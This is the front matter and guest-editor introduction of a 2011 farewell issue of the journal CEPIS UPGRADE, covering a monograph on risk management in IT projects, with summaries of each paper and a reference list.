the full issue here

Transcription

the full issue here
CEPIS UPGRADE is the European Journal
for the Informatics Professional, published bimonthly at <http://cepis.org/upgrade>
Publisher
CEPIS UPGRADE is published by CEPIS (Council of European Professional Informatics Societies, <http://www.
cepis.org/>), in cooperation with the Spanish CEPIS society
ATI (Asociación de Técnicos de Informática, <http://
www.ati.es/>) and its journal Novática
CEPIS UPGRADE monographs are published jointly with
Novática, that publishes them in Spanish (full version printed;
summary, abstracts and some articles online)
CEPIS UPGRADE was created in October 2000 by CEPIS and was
first published by Novática and INFORMATIK/INFORMATIQUE,
bimonthly journal of SVI/FSI (Swiss Federation of Professional
Informatics Societies)
CEPIS UPGRADE is the anchor point for UPENET (UPGRADE European NETwork), the network of CEPIS member societies’ publications,
that currently includes the following ones:
• inforewiew, magazine from the Serbian CEPIS society JISA
• Informatica, journal from the Slovenian CEPIS society SDI
• Informatik-Spektrum, journal published by Springer Verlag on behalf
of the CEPIS societies GI, Germany, and SI, Switzerland
• ITNOW, magazine published by Oxford University Press on behalf of
the British CEPIS society BCS
• Mondo Digitale, digital journal from the Italian CEPIS society AICA
• Novática, journal from the Spanish CEPIS society ATI
• OCG Journal, journal from the Austrian CEPIS society OCG
• Pliroforiki, journal from the Cyprus CEPIS society CCS
• Tölvumál, journal from the Icelandic CEPIS society ISIP
Editorial TeamEditorial Team
Chief Editor: Llorenç Pagés-Casas
Deputy Chief Editor: Rafael Fernández Calvo
Associate Editor: Fiona Fanning
Editorial Board
Prof. Nello Scarabottolo, CEPIS President
Prof. Wolffried Stucky, CEPIS Former President
Prof. Vasile Baltac, CEPIS Former President
Prof. Luis Fernández-Sanz, ATI (Spain)
Llorenç Pagés-Casas, ATI (Spain)
François Louis Nicolet, SI (Switzerland)
Roberto Carniel, ALSI – Tecnoteca (Italy)
UPENET Advisory Board
Dubravka Dukic (inforeview, Serbia)
Matjaz Gams (Informatica, Slovenia)
Hermann Engesser (Informatik-Spektrum, Germany and Switzerland)
Brian Runciman (ITNOW, United Kingdom)
Franco Filippazzi (Mondo Digitale, Italy)
Llorenç Pagés-Casas (Novática, Spain)
Veith Risak (OCG Journal, Austria)
Panicos Masouras (Pliroforiki, Cyprus)
Thorvardur Kári Ólafsson (Tölvumál, Iceland)
Rafael Fernández Calvo (Coordination)
Vol. XII, issue No. 5, December 2011
Farewell Edition
3 Editorial. CEPIS UPGRADE: A Proud Farewell
— Nello Scarabottolo, President of CEPIS
ATI, Novática and CEPIS UPGRADE
— Dídac López-Viñas, President of ATI
Monograph
Risk Management
(published jointly with Novática*)
Guest Editor: Darren Dalcher
4 Presentation. Trends and Advances in Risk Management
— Darren Dalcher
10 The Use of Bayes and Causal Modelling in Decision Making,
Uncertainty and Risk — Norman Fenton and Martin Neil
22 Event Chain Methodology in Project Management — Michael
Trumper and Lev Virine
34 Revisiting Managing and Modelling of Project Risk Dynamics A System Dynamics-based Framework — Alexandre Rodrigues
41 Towards a New Perspective: Balancing Risk, Safety and Danger
— Darren Dalcher
45 Managing Risk in Projects: What’s New? — David Hillson
48 Our Uncertain Future — David Cleden
55 The application of the ‘New Sciences’ to Risk and Project
Management — David Hancock
English Language Editors: Mike Andersson, David Cash, Arthur
Cook, Tracey Darch, Laura Davies, Nick Dunn, Rodney Fennemore,
Hilary Green, Roger Harris, Jim Holder, Pat Moody.
59 Communicative Project Risk Management in IT Projects
— Karel de Bakker
Cover page designed by Concha Arias-Pérez
"Liberty with Risk" / © ATI 2011
Layout Design: François Louis Nicolet
Composition: Jorge Llácer-Gil de Ramales
67 Decision-Making: A Dialogue between Project and Programme
Environments — Manon Deguire
Editorial correspondence: Llorenç Pagés-Casas <[email protected]>
Advertising correspondence: <[email protected]>
Subscriptions
If you wish to subscribe to CEPIS UPGRADE please send an
email to [email protected] with ‘Subscribe to UPGRADE’ as the
subject of the email or follow the link ‘Subscribe to UPGRADE’
at <http://www.cepis.org/upgrade>
Copyright
© Novática 2011 (for the monograph)
© CEPIS 2011 (for the sections Editorial, UPENET and CEPIS News)
All rights reserved under otherwise stated. Abstracting is permitted
with credit to the source. For copying, reprint, or republication permission, contact the Editorial Team
75 Decisions in an Uncertain World: Strategic Project Risk
Appraisal — Elaine Harris
82 Selection of Project Alternatives while Considering Risks
— Marta Fernández-Diego and Nolberto Munier
87 Project Governance — Ralf Müller
91 Five Steps to Enterprise Risk Management — Val Jonas
./..
The opinions expressed by the authors are their exclusive responsibility
ISSN 1684-5285
* This monograph will be also published in Spanish (full version printed; summary, abstracts, and some
articles online) by Novática, journal of the Spanish CEPIS society ATI (Asociación de Técnicos de
Informática) at <http://www.ati.es/novatica/>.
Vol. XII, issue No. 5, December 2011
Farewell Edition
Cont.
UPENET (UPGRADE European NETwork)
99
From inforeview (JISA, Serbia)
Information Society
Steve Jobs — Dragana Stojkovic
101 From Informatica (SDI, Slovenia)
Surveillance Systems
An Intelligent Indoor Surveillance System — Rok Piltaver,
Erik Dovgan, and Matjaz Gams
111 From Informatik Spektrum (GI, Germany, and SI, Switzerland)
Knowledge Representation
What’s New in Description Logics — Franz Baader
121 From ITNOW (BCS, United Kingdom)
Computer Science
The Future of Computer Science in Schools — Brian Runciman
124 From Mondo Digitale (AICA, Italy)
IT for Health
Neuroscience and ICT: Current and Future Scenarios
— Gianluca Zaffiro and Fabio Babiloni
135 From Novática (ATI, Spain)
IT for Music
Katmus: Specific Application to support Assisted Music
Transcription — Orlando García-Feal, Silvana Gómez-Meire,
and David Olivieri
145 From Pliroforiki (CCS, Cyprus)
IT Security
Practical IT Security Education with Tele-Lab — Christian
Willems, Orestis Tringides, and Christoph Meinel
CEPIS NEWS
153 Selected CEPIS News — Fiona Fanning
Editorial
Editorial
CEPIS UPGRADE: A Proud Farewell
It was in year 2000 that CEPIS made the decision to
create "a bimonthly technical, independent, non-commercial freely distributed electronic publication", with the aim
of gaining visibility among the large memberships of its
affiliated societies, and beyond this, the wider ICT communities in the professional, business, academic and public administration sectors worldwide, contributing in parallel to
enlarge and permanently update their professional skills and
knowledge.
CEPIS UPGRADE was the name chosen for that journal, born with the initial cooperation and support of the societies ATI (Asociación de Técnicos de Informática, Spain)
and SVI/FSI (Swiss Federation of Professional Informatics
Societies), along with their respective publications, Novática
and Informatik/Informatique, cooperation and support that
have continued until now, in the case of ATI and Novática.
Eleven years and more than 60 issues later, actual measurable facts show that CEPIS UPGRADE has achieved those
goals: hundreds of thousands visits to, and downloads from,
the journal website at <http://www.cepis.org/upgrade>; presence in prestigious international indexes; references by many
publications; citations made in countless business, professional, academic and even political fora; a newsletter with
around 2,500 subscribers.
All these achievements must be duly stressed now that
CEPIS has made the decision of discontinuing CEPIS UPGRADE because it is not at all failure or lack of results that
have dictated this extremely painful choice but the general
economic climate. In our case, CEPIS has reached the conclusion that publishing a technical-professional journal is
not a top priority today and that our resources should be
dedicated to other projects and activities.
CEPIS is proud of its journal and at the sad moment of
distributing its farewell issue our most sincere acknowledgement and gratitude must be presented to all and everyone
who have contributed to its success. Let me name a few of
them: the above mentioned societies ATI and SVI/FSI;
Wolffried Stucky and François Louis Nicolet, that gave the
initial spin; the three Chief Editors that have skillful and
dedicatedly led the journal along these eleven years (the
same François Louis Nicolet, Rafael Fernández Calvo and
Llorenç Pagés-Casas); professionals in Spain, Belgium and
Switzerland (in special Fiona Fanning, Jorge Llácer, CarolAnn Kogelman, Pascale Schürman and Steve Turpin). Plus
the Chief Editors of the nine publications making part of
© CEPIS
Farewell Edition
UPENET (UPGRADE European NETwork), set up in 2003
in order to increase the pan-European projection of the journal.
And, last but not least, thanks a lot also to the multitude
of authors from Europe and other continents who have submitted their papers for review and publication, as well as to
the Guest Editors of the monographs and our team of volunteer English-language editors. We cannot praise them all
enough for their decisive and valuable collaboration.
Now let’s say farewell to CEPIS UPGRADE, but a really proud one!
Nello Scarabottolo
President of CEPIS
<http://www.cepis.org>
Note: A detailed history of CEPIS UPGRADE is available at
<http://www.cepis.org/upgrade/files/iv-09-calvo.pdf>.
ATI, Novática and
CEPIS UPGRADE
The lifecycle of CEPIS UPGRADE has come to an
end after eleven years. The decision has been taken by the
governing bodies of CEPIS and is fully shared by the
Board of ATI (Asociación de Técnicos de Informática),
the Spanish society that has edited the journal on behalf
of CEPIS from the very beginning.
ATI, a founding member of CEPIS which has participated in a large number of its projects and undertakings,
is proud to have played a decisive role in CEPIS UPGRADE’s success by providing all its own human and
material editorial resources through its journal Novática.
We must thank CEPIS for having given us the opportunity to be part of such an important publishing endeavour.
New projects and activities will undoubtedly be promoted by CEPIS and, as in the case of CEPIS UPGRADE,
ATI will, as always, be available and willing to cooperate.
Dídac López-Viñas
President of ATI
<http://www.ati.es>
CEPIS UPGRADE Vol. XII, No. 5, December 2011
3
Risk Management
Presentation
Trends and Advances in Risk Management
Darren Dalcher
1 Introduction
Risks can be found in most human endeavours. They
come from many sources and influence most participants.
Increasingly, they play a part in defining and shaping activities, intentions and interpretations, and thereby directly
influencing the future. Accomplishing anything inevitably
implies addressing risks. Within organisations and society
at large, learning to deal with risk is therefore progressively
viewed as a key competence expected at all levels.
Practitioners in computing and information technology
are at the forefront of many new developments. Modern society is characterised by powerful technology, instantaneous communication, rising complexity, tangled networks and
unprecedented levels of interaction and participation. Devising new ways of integrating with modern society inevitably imply learning to co-exist with higher levels of risk,
uncertainty and ignorance. Moreover, society engages in
more demanding ventures whilst continuously requiring
performance and delivery levels that are better, faster and
cheaper. Developers, managers, sponsors, senior executives
and stakeholders are thus faced with escalating levels of risk.
In order to accommodate and address risk we have built
a variety of mechanisms, approaches and structures that we
utilise in different levels and situations. This special issue
brings together a collection of reflections, insights and experiences from leading experts working at the forefront of
risk assessment, analysis, evaluation, management and communication. The contributions come from a variety of domains addressing a myriad of tools, perspectives and new
approaches required for making sense of risk at different
levels within organisations. Many of the papers report on
new ideas and advances thereby offering novel perspectives
and approaches for improving the management of risk. The
papers are grounded in both research and practice and therefore deliver insights that summarise the state of the discipline whilst indicating avenues for improvement and placing new trends in the context of risk management and leadership in an organisational setting.
2 Structure and Contents of the Monograph
The thirteen papers selected for the issue showcase four
perspectives in terms of the trends identified within the risk
management domain. The first three papers report on new
tools and approaches that can be used to identify complex
dependencies, support decision making and develop improved capability for uncertainty modelling. The following
four papers look at new ways of interacting with risk man-
4
CEPIS UPGRADE Vol. XII, No. 5, December 2011
The Guest Editor
Darren Dalcher – PhD (Lond) HonFAPM, FBCS, CITP, FCMI
– is a Professor of Software Project Management at Middlesex
University, UK, and Visiting Professor in Computer Science in
the University of Iceland. He is the founder and Director of the
National Centre for Project Management. He has been named
by the Association for Project Management, APM, as one of
the top 10 "movers and shapers" in project management and
has also been voted Project Magazine’s Academic of the Year
for his contribution in "integrating and weaving academic work
with practice". Following industrial and consultancy experience
in managing IT projects, Professor Dalcher gained his PhD in
Software Engineering from King’s College, University of
London, UK. Professor Dalcher is active in numerous
international committees, steering groups and editorial boards.
He is heavily involved in organising international conferences,
and has delivered many keynote addresses and tutorials. He
has written over 150 papers and book chapters on project
management and software engineering.
He is Editor-in-Chief of Software Process Improvement and
Practice, an international journal focusing on capability,
maturity, growth and improvement. He is the editor of a major
new book series, Advances in Project Management, published
by Gower Publishing. His research interests are wide and include
many aspects of project management. He works with many
major industrial and commercial organisations and government
bodies in the UK and beyond. Professor Dalcher is an invited
Honorary Fellow of the Association for Project Management
(APM), a Chartered Fellow of the British Computer Society
(BCS), a Fellow of the Chartered Management Institute, and a
Member of the Project Management Institute, the Academy of
Management, the IEEE and the ACM. He has received an
Honorary Fellowship of the APM, "a prestigious honour
bestowed only on those who have made outstanding
contributions to project management", at the 2011 APM Awards
Evening. <[email protected]>
agement and the development of new perspectives and
lenses for addressing uncertainty and the emergence of risk
leadership, thereby encouraging a new understanding of
the concept of risk. The next two papers report on results
from empirical studies related to differences in the perception of decisions between managers of projects and programmes and on the difference that risk management can
make in avoiding IT project failures. The final four papers
look at the development of decision making and risk man-
Farewell Edition
© Novática
Risk Management
“
Practitioners in computing and information
technology are at the forefront of many new developments
”
agement infrastructure by addressing areas such as strategic project risk appraisal, project governance, selection of
alternative projects at the portfolio level and the development of enterprise risk management.
Many risk calculations, especially in banking and insurance, are derived from statistical models operating on carefully collected banks of historical data. The other typical
approach relies on developing risk registers and quantifying the exposure to risk by identifying and estimating the
probability and the loss impact. The paper by Fenton and
Neil encourages practitioners to look beyond simple causal
explanations available through identification of correlation
or the somewhat ‘accidental’ figures developed through registers. In order to obtain a true measure of risk, practitioners must therefore develop a more holistic perspective that
embraces a causal view of dependencies and
interconnectedness of events. Bayes networks have long
been used to depict relationships and conditional dependencies. The authors show how risks can be modelled as event
chains with a number of possible outcomes, enabling the
integration of risks from multiple perspectives and the decomposition of a risk problem into chains of interrelated
events. As a result, control and mitigation measures may
become more obvious through the process of modelling risks
and the identification of relationships and dependencies that
extend beyond simple causal explanations.
Project planning is initiated during the earlier part of a
project, when uncertainty is at its greatest. The resulting
schedules often fail to capture the full detail of reality.
Moreover, they fail to account for change. The paper by
Trumper and Virine proposes Event Chain methodology
as an approach for modelling uncertainty and evaluating
the impacts of events on project schedules. Event chain
methodology is informed by ideas from other disciplines
and has been used as a network analysis technique in project
management. Tools such as event chain diagrams visualise
the complex relationships and interdependencies between
events. The collection of tools and diagrams support the
planning, scheduling and monitoring of projects allowing
management to visualise some of the issues and take corrective action. The Event Chain methodology takes into
account factors such as delays, chains and complex dynamics that are not acknowledged by other scheduling methods. They attempt to overcome human and knowledge limitations and enable updating of schedules in light of new
information that emerges throughout the development process.
Complex relationships and interdependencies between
casus and effects require more complex method of modelling the impacts and influences between factors. Moreover
the dynamics emerging from the uncertain knowledge ne-
© Novática
Farewell Edition
cessitate a deeper understanding of causal interactions. The
paper by Rodrigues highlights the use of systems dynamics
to capture some of the closed chains of feedback operating
with uncertain environments. Feedback loops and impact
diagrams can show the effects of positive feedback cycles
that can be used to “snowball” alongside other non-linear
effects. Dynamic modelling provides an effective tool for
identifying emergent risks resulting from complex interactions, interconnected chains of causes and events and chains
of feedback. They encourage the adoption of holistic solutions by investigating the full conditions that play a part in
a certain interaction, identifying the full chain of events leading to a risk. Moreover, as the model includes multiple variables, it becomes possible to assess the range of impacts on
all aspects and objectives and determine the interactions of
risks, events and causes in order to derive a better understanding of the true complexity and the behaviour of the
risks.
Developing the right strategy for addressing risk depends
on the context. Different approaches will appeal depending
on the specific circumstances and the knowledge, and uncertainty associated with a situation. Dalcher contends that
risk is often associated with danger, and makes use of the
idea of safety to identify different positions on a spectrum
with regards to our approach to risk. At one extreme, anticipation relies on developing full knowledge of the circumstances in advance. Addressing risks can proceed in a reasonably systematic manner through quantification and adjustments. The other alternative is to develop sufficient flexibility to enable the system to adopt a resilient stance that
allows it to be ready to respond to uncertainties, as they
emerge, in a more dynamic fashion. This is done by searching for the next acceptable state and allowing the system to
evolve and grow through experimentation. While the ideal
position is somewhere between the two extremes, organisations can try to balance the different perspectives in a more
dynamic fashion. The adoption of alternative metaphors may
also help to think about risk management in new ways. We
often acknowledge that risk is all about perspective. If managers focus on safety as a resource, they can develop an
alternative representation of the impacts of risk. The dynamic management of safety, or well being can thus benefit
from a change of perspective that allows managers to engage with opportunities, success and the future in new ways.
Managing risk is closely integrated with project management. However, despite the awareness of risk and the
recognition of the role of risk management in successfully
delivering projects there is still evidence that risk is not being viewed as an integrated perspective that extends beyond processes. Indeed, the management of risk is not a
precise and well-defined science: It is an art that relies on
CEPIS UPGRADE Vol. XII, No. 5, December 2011
5
Risk Management
“
This special edition brings
together a collection
of reflections, insights
and experiences from leading
experts working at the forefront
of risk issues
”
attitudes, perceptions, expectations, preferences, influences,
biases, stakeholders and perspectives. The paper by Hillson
looks at how risk is managed in projects. Focusing on risks
in a project, may ignore the risk that the overall project poses
to the organisation, perhaps at a portfolio or programme
level. The actual process of managing risks is often flawed
as some of the links and review points are missing. Moreover, insufficient attention has been paid to the human component in risk assessment. Overall the process required for
managing risks requires a more dynamic approach responsive to learning and change. Revisiting our current processes and rethinking our approach can serve to improve our
engagement with risk, thereby improving the outcomes of
projects.
The management of uncertainty, as opposed to risk, offers new challenges. The impact of uncertainty often defers
decisions and delays actions as managers attempt to figure
out their options. While risks can be viewed as the known
unknowns, uncertainty is concerned with the unknown unknowns that are not susceptible to analysis and assessment.
Increasingly, organisations allocate additional contingency
resources for other things that we do not know about. The
paper by Cleden contends that the management of uncertainty requires a completely different approach. Uncertainties cannot be analysed and formulated. Managing project
uncertainty depends on developing an understanding of the
life cycle of uncertainty. Projects exist in a continual state
of dynamic tension with the accumulation of uncertainties
contributing to pushing the project away from its expected
trajectory. Managers endeavour to act swiftly to correct the
deviations and must therefore apply a range of strategies
required to stabilise the project. Uncertainties result from
complex dynamics which will often defy organised attempts
at careful planning. The solution is to adapt and restructure
in a flexible and resilient fashion that will allow the project
to benefit from the uncertainty. Small adjustments will
thereby allow projects to improve and adjust whilst responding favourably to the conditions of uncertainty.
Project managers often have to deal with novel, one of a
kind, unfocused and complex situations that can be characterised as ill structured. To reflect the open-ended, interconnected, social perspective, planners and designers talk of
wicked problems. Such problems tend to be ill-defined and
rely upon much elusive political judgement for resolution.
The paper by Hancock points out that projects are not tame,
6
CEPIS UPGRADE Vol. XII, No. 5, December 2011
instead displaying chaotic, messy and wicked characteristics. Behavioural and dynamic complexities co-exist and
interact confounding decision makers. Applying simplistic, sequential resolution processes is simply inadequate for
messy problems. Problems cannot be solved in isolation
require conceptual, systemic and social resolution. Moreover, solutions are likely to be good enough at best and will
require stakeholder participation and engagement. The direct implication for tackling uncertainty and addressing
complexity is that the managing risks mindset needs to be
evolved into a risk leadership perspective. Such perspective would look to guide, learn and adapt to new situations.
Different events, outcomes and behaviours would require
adjustments and the risk process needs to adapt in order to
overcome major political issues. To address the new uncertainties requires a move away from controlling risk towards
a negotiated flexibility that accommodates the disorder and
unpredictability inherent in many complex project environments.
Risk management is often proposed as a solution to the
high failure rate in IT projects. However, the literature is at
best inconclusive about the contributions of risk management to project success. The paper by de Bakker reports on
a detailed literature review which only identified anecdotal
evidence to this effect. A further analysis confirms that risk
management needs to be considered in social terms given
the interactive nature of the process and the limited knowledge that exists about the project and the desired outcomes.
In the following stage, a collection of case studies identified the activity of risk identification as a crucial step contributing to success, as viewed by all involved stakeholders.
It would appear that the action, understanding and reflection generated during that phase make recognisable contributions as identified by the relevant stakeholders. Risk reporting is likewise credited with generating an impact. An
experiment with 53 project groups suggests that those that
carried out a risk identification and discussed the results
performed significantly better than those who did not. These
groups also seemed to be more positive about their project
and the result. The research suggests that it is the exchange
and interaction that make people more aware of the issues.
It also helps in forming the expectations of the different
stakeholders groups. The discussion also has inevitable side
effects, such as changing people’s views about probabilities and values. Nonetheless, the act of sharing, discussing
and deliberating appear to be crucial in forming a better
“
Many of the papers report on
new ideas and advances thereby
offering novel perspectives and
approaches for improving the
management of risk
”
Farewell Edition
© Novática
Risk Management
“
The thirteen papers selected for the issue showcase
four perspectives in terms of the trends identified
within the risk management domain
”
crucial in forming a better understanding of the issues and
their scale and magnitude.
The long held assumption of utilising linear sequences
in order to address problems, guide projects and make decisions have contributed to the perception of project and
risk management as engineering or technical domains. Some
of the softer aspects related to the human side of interaction
have been neglected over the years. Deguire points out that
to accommodate complexity the softer aspects of human
interaction need to be taken into account. Indeed, problem
solving requires reflection, interaction and deliberation.
Given that problems and decisions are addressed at the
project management and in some organisations, also at programme management level, and that their approaches to
solving problems require deliberations and reflection at a
different level of granularity, it is interesting to contrast the
perceptions and expectations of managers in these domains.
In contrast with project managers, programme managers
appear to favour inductive processes. The difference might
relate to the need to deliver outcomes and benefits, rather
than outputs and products. As the level of complexity rises,
decisions become more context-related and less mechanistic. Decisions made by programme manager may relate to
making choices about specific projects and determining
wider direction and thus compel managers to engage with
the problem and its context. Indeed, the need to define more
of the assumptions in a wider context, forces deeper and
wider consideration, involving people, preferences, context
and organisational issues.
Early choices need to be made about selecting the right
projects, committing resources and maintaining portfolios
and programmes which are balanced. These decisions are
taken at an early stage under conditions of uncertainty and
can be viewed as strategic project decisions. The project
appraisal process and the decision making behaviour that
accompanies it clearly influence the resulting project. The
paper by Harris explores the strategic level risks encountered by managers in different types of projects. This is
achieved by developing a project typology identifying eight
major types of strategic level projects and their typical characteristics. It provides a rare link between strategic level
appraisal and risk management by focusing on the common
risks shared by each type. The strategic investment appraisal
process proposed in the work further supports the implementation of effective decision making ranging from idea
generation and opportunity identification through preliminary assumptions to the findings of the post audit review.
Overall, managers can be guided towards implementing a
strategy that is better suited to the context of their project
thereby enabling the development of a more flexible and
© Novática
Farewell Edition
adaptable response. Identification of risks at an early stage
enables better decision making when uncertainty is at its
height.
The choice of the most suitable project is often subject
to constraints regarding financial, technical, environmental
or geographical constrains. Choices often have to be made
at the project portfolio level to select the most viable, or
useful approach. Alternatively, even when a project has been
agreed in principle, there is still a need to determine the
most suitable method for delivering the benefits. The paper
by Fernández-Diego and Munier offers the use of linear
programming method to support the choice of a particular
approach and quantify the risks relevant for each of the
options. The approach allows decision maker to maximise
on the basis of particular threats (or benefits) and balance
various factors. The use of linear programming in project
management for quantifying values and measuring constraints is relatively new.
Large corporate failures in the last decade have raised
awareness of the need for organisational governance functions to oversee the effectiveness and integrity of decision
making in organisations. Governance spans the entire scope
of corporate activity extending from strategic aspects and
their ethical implications to the execution of projects and
tasks. It provides the mechanisms, frameworks and reference points for self-regulation. Project governance is rapidly becoming a major area of interest for many organisations and is the topic of the paper by Müller. Governance
sets of boundaries for project management action by defining the objectives, providing the means to achieve them and
evaluating and controlling progress. The orientation of the
organisation in terms of being share holder and stakeholder
oriented, and the control focus on outcome or behaviour
would play a key part in identifying the most suitable governance paradigm which can range between conformist, and
agile pragmatist to versatile artist. The paradigm in turn can
shape the approach of the organisation to development, the
processes applied and the overall orientation and structure.
The governance of project management plays a part in directing the governance paradigm, which guides the governance of portfolios, programmes and projects. This helps
to reduce the risk of conflicts and inconsistencies and support the achievement of organisational goals.
Focusing only on operational risks related to a specific
implementation project is insufficient. Risk relates to and
impact organisational concerns concerned with the survival,
development and growth of an organisation. Specific
projects will incur individual risks. They will also contribute to the organisation’s risk and may impact other areas
and efforts. The paper by Jonas introduces Enterprise Risk
CEPIS UPGRADE Vol. XII, No. 5, December 2011
7
Risk Management
“
While there is still a long
way to go, the journey seems
to be both promising,
and exciting
”
Management as a wider framework sued by the entire business to assess the overall exposure to risk, and the organisational ability to make timely and well informed decisions.
The paper looks at the five steps required to implement a
simple and effective enterprise Risk Management framework. The approach encourages horizontal integration of
organisational risk allowing different units to become aware
of the potential impacts of initiatives in other areas on their
own future, targets, and systems. The normal expectation is
for vertical integration where guidance and instructions are
passed downwards and information is cascaded upwards.
However the cross functional perspective allows integration and sharing across different functional units. Vertical
management chains can be used to support leadership and
provide the basis for improved decision making through
enterprise-wide reporting. The required culture change is
from risk management to managing risk. Facilitating the shift
requires people to look ahead and make risk-focused decisions that will benefit their organisations. It also requires
the support and reward mechanisms to recognise and support such a shift.
There are some common themes that run through the
papers in this monograph. Most modern undertakings involve people: Processes cannot ignore the human element
and focus on computational steps alone and therefore a
greater attention to subjective perceptions, stakeholders and
expectation pervades many of the articles. The context of
risk is also crucial. Most authors refer to complex dynamics
and interactions. It would appear that our projects are becoming increasingly more complex and the risks we grapple with increasingly involve technical, social and environmental impacts. The unprecedented level of uncertainty
seems to feature in many of the contributions. The direction advocated in many of the papers requires a growing
recognition of the dynamics involved in interactions, of the
need to lead and guide, of holistic and systemic aspect of
solving problems, of the need to adapt and respond and of
a need to adopt a more strategic, enterprise-wide view of
situations.
3 Looking ahead
Risk management appears to be an active area for researchers and practitioners. It is encouraging to see such a
range of view and perspectives and to hear about the advances being proposed. New work in the areas of decision
making, uncertainty, complexity, problem solving, enterprise risk management and governance will continue to revitalise risk management knowledge, skills and competences.
Risk management has progressed in the last 25 years, but it
appears that the new challenges and the focus on organisations, enterprises, and wider systems will add new ideas
and insights. In this issue leading researchers and practitioners have surveyed the development of ideas, perspectives and concepts within risk management opened a
glimpse and given us a glimpse of the potential solutions.
The journey from risk management towards the wider management of risk, opportunity and uncertainty feels exciting
and worthwhile. While there is still a long way to go, the
journey seems to be both promising, and exciting.
Acknowledgements
Sincere thanks must be extended to all the authors for their
contribution to this special issue. The UPGRADE Editorial Team
must be also mentioned, in particular the Chief Editor, Llorenç
Pagés, for his help and support in producing this issue.
Useful References on "Risk Management"
In addition to the materials referenced by the authors
in their articles, we offer the following ones for those who
wish to dig deeper into the topics covered by the monograph.
Books
„ J. Adams, J. (1995). Risk, UCL Press, 1995.
„ D. Apgar. Risk Intelligence, Harvard Business
School Press, 2006.
„ P.L. Bernstein. Against the Gods: The remarkable
Story of Risk, Wiley, 1998.
„ B.W. Boehm. Software Risk Management, IEEE
Computer Society Press, 1989.
„ R.N. Charette. Software Engineering Risk Analysis
and Management, McGraw Hill, 1989.
8
CEPIS UPGRADE Vol. XII, No. 5, December 2011
„
D. Cleden. Managing Project Uncertainty, Gower,
2009.
„ D. Cooper, S. Grey, G. Raymond, P. Walker. Managing Risk in Large Projects and Complex Procurements,
Wiley, 2005.
„ T. DeMarco. Waltzing with Bears, Dorset House,
2003.
„ N. Fenton, M. Neil. Risk Assessment and Decision
Analysis with Bayesian Networks, CRC Press, 2012.
„ G. Gigerenzer. Reckoning with Risk, Penguin
Books, 2003.
„ E. Hall. Managing Risks: Methods for Software
Systems Development, Addison Wesley, 1998.
„ D. Hancock. Tame, Messy and Wicked Risk Leadership, Gower, 2010.
Farewell Edition
© Novática
Risk Management
„ E. Harris. Strategic Project Risk Appraisal and Management, Gower, 2009.
„ D. Hillson, P. Simon. Practical Project Risk Management: The ATOM Methodology, Management Concepts, 2007.
„ D. Hillson. Managing Risk in Projects, Gower, 2009.
„ C. Jones. Assessment and Control of Software Risks,
Prentice Hall, 1994.
„ M. Modarres. RiskAnalysis in Engineering: Techniques, Tools and Trends, Taylor and Francis, 2006,
„ R. Müller. Project Governance, Gower, 2009.
„ M. Ould. Managing Software Quality and Business
Risk, Wiley, 1999.
„ P.G. Smith, G.M. Merritt. Proactive Risk Management: Controlling Uncertainty in Product Development,
Productivity Press, 2002.
„ N.N. Taleb. The Black Swan: The Impact of the
Highly Improbable, Randon House, 2007.
„ S. Ward, C. Chapman. How to Manage Project Opportunity and Risk, 3rd edition, John Wiley, 2011.
„ G. Westerman, R. Hunter. IT Risk: Turning Business threats into Competitive Advantage, Harvard Business School Press, 2007.
Articles and Papers
H. Barki, S. Rivard, J. Talbot. Toward an Assessment of Software Development Risk, Journal of Management Information Systems, 10 (2) 203-225, 1993.
„ C.B. Chapman. Key Points of Contention in Framing Assumptions for Risk and Uncertainty Management,
International Journal for Project Management, 24(4), 303313, 2006.
„ F.M. Dedolph. The Neglected Management Activity: Software Risk Management, Bell Labs Technical Journal, 8(3), 91-95, 2003.
„ A. De Meyer, C.H. Loch, M.T. Pich. Managing
Project Uncertainty: From Variation to Chaos, MIT Sloan
Management Review, 59-67, 2002.
„ R.E. Fairley. Risk Management for Software
Projects, IEEE Software, 11(3), 57-67, 1994.
„ R.E. Fairley. Software Risk Management Glossary,
IEEE Software, 22(3), 101, 2005.
„ D. Gotterbarn S. Rogerson. Responsible Risk Analysis for Software Development: Creating the Software Development Impact Statement, Communications of the Association for Information Systems, 15, 730-750, 2005.
„ S.J. Huang, W.M. Han. Exploring the Relationship
between Software Project Duration and Risk Exposure: A
Cluster Analysis, Journal of Information and Management,
45 (3,) 175-182, 2008.
„ J. Jiang, G. Klein. Risks to Different Aspects of SysTem Success, Information and Management, 36 (5) 264272, 1999.
„ J.J. Jiang, G. Klein, S.P.J. Wu, T.P. Liang. The Relation of Requirements Uncertainty and Stakeholder Perception Gaps to Project Management Performance, The Jour„
© Novática
Farewell Edition
nal of Systems and Software, 82 (5,) 801-808, 2009.
„ M. Kajko-Mattsson, J. Nyfjord. State of Software
Risk Management Practice, IAENG International Journal
of Computer Science, 35(4), 451-462, 2008.
„ M. Keil, L. Wallace, D. Turk, G. Dixon-Randall, U.
Nulden. An Investigation of Risk Perception and Risk Propensity on the Decision to Continue a Software Development Project, The Journal of Systems and Software,
53(2)145-157, 2000.
„ T.A. Longstaff, C. Chittister, R. Pethia, Y.Y. Haimes.
Are We Forgetting the Risks of Information Technology?
IEEE Computer, 33(12) 43-51, 2000.
„ S. Pender. Managing Incomplete Knowledge: Why
Risk Management is not Sufficient, 19(1), 79-87, 2001.
„ O. Perminova, M. Gustaffson, K. Wikstrom. Defining Uncertainty in Projects: A New Perspective, International Journal of Project Management, 26(1), 73-79, 2008.
„ S. Pfleeger. Risky Business: What we have Yet to
Learn About Risk Management, Journal of Systems and
Software, 53(3), 265-273, 2000.
„ J. Ropponen, K. Lyytinen. Components of Software
Development Risk: How to Address Them? A Project Manager Survey, IEEE Transactions on Software Engineering,
26 (2),2000, 98-112.
„ L. Sarigiannidis, P. Chatzoglou. Software Development Project Risk Management: A New Conceptual Framework, Journal of Software Engineering and Applications
(JSEA), 4 (5) 293 – 305, 2011.
„ R. Schmidt, K. Lyytinen, M. Keil, P. Cule. Identifying Software Project Risks: An International Delphi Study,
Journal of Management Information Systems, 17(4), 536, 2001.
„ L. Wallace, M. Keil. Software Project Risks and their
Effects on Project Outcomes, Communications of the
ACM, 47(4), 68-73, 2004.
„ L. Wallace, M. Keil, A. Rai. Understanding Software Project Risk: A Cluster Analysis, Journal of Information and Management, 42 (1), 115-125, 2004.
Web Sites
<http://www.best-management-practice.com/RiskManagement-MoR/>.
„ <http://www.computerweekly.com/feature/RiskManagement-Software-Essential-Guide>
„ <http://www.riskworld.com/>
„ <http://www.riskworld.com/websites/webfiles/
ws5aa015.htm>
„ Directory of risk management websites: <http://
www.riskworld.com/websites/webfiles/ws00aa009.htm>
